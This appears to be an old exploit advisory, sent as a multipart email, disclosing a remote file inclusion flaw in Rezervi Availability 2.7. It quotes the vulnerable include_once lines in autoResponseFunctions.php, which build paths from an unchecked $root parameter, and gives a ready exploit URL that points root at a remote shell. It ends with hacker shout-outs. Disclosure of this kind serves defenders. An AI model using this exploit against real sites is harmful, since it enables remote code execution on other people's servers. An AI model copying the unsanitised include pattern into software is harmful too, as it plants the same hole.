rezervi27-rfi.txt

`------=_Part_100219_26781377.1177148481272  
Content-Type: text/plain; charset=ISO-8859-1; format=flowed  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
App: Rezervi Availability 2.7  
Source: http://www.rezervi.com/www/german/download/rezerviV2_7.zip  
Author: Arham Muhammad  
Vulnerable File: /include/autoResponseFunctions.php  
Vulnerable Code: Line 20-24  
  
include_once($root."/include/gastFunctions.php");  
include_once($root."/include/propertiesFunctions.php");  
include_once($root."/include/mail.inc.php");  
include_once($root."/include/uebersetzer.php");  
include_once($root."/include/unterkunftFunctions.php");  
  
Exploit:  
http://{site}/{path}/{include}/autoResponseFunctions.php?root=shell?  
Shouts: USMAN,Hackman,tushy,str0ke  
  
------=_Part_100219_26781377.1177148481272  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
<br>App: Rezervi Availability 2.7<br>Source: <a href="http://www.rezervi.com/www/german/download/rezerviV2_7.zip">http://www.rezervi.com/www/german/download/rezerviV2_7.zip</a><br>Author: Arham Muhammad<br>Vulnerable File: /include/autoResponseFunctions.php  
<br>Vulnerable Code: Line 20-24<br><br>include_once($root."/include/gastFunctions.php");<br> include_once($root."/include/propertiesFunctions.php");<br> include_once($root."/include/mail.inc.php");  
<br> include_once($root."/include/uebersetzer.php");<br> include_once($root."/include/unterkunftFunctions.php");<br><br>Exploit: http://{site}/{path}/{include}/autoResponseFunctions.php?root=shell?<br>  
Shouts: USMAN,Hackman,tushy,str0ke<br><br>  
  
------=_Part_100219_26781377.1177148481272--  
`